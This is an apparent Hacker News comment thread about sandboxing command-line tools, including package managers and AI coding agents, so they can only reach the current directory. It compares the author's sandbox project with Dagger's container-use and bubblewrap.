This looks awesome! Do you have a mental process you run through to determine what gets run in the sandbox, or is it your default mode for all tools?


> This looks awesome! Do you have a mental process you run through to determine what gets run in the sandbox, or is it your default mode for all tools?

Here's what I use it for right now

- yarn - npm - pnpm - mdl - Ruby-based Markdown linter - fastlane - Ruby-based mobile app release tool by Google - Claude Code - Gemini CLI

Over time, my goal is to run all CLI-based tools that only need access to the current directory (and not parent directories) via this.


Why not just use the standard Linux tool bubblewrap?


That's why I run it inside a sandbox - https://github.com/ashishb/amazing-sandbox


Dagger also made something: https://github.com/dagger/container-use


Afaik, code running inside https://github.com/dagger/container-use can still access files outside the current directory.


Do you have any source for that claim? I'm curious and worried.


Does the lack of pip confuse Claude, that would seemingly be pretty big


> Does the lack of pip confuse Claude, that would seemingly be pretty big

It has not been an issue for me. But yeah, one can always enhance and use a custom image with whatever possible tools they want to install.


I run them inside a sandbox.

The npm community is too big that one can never discard it for frontend development.


Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: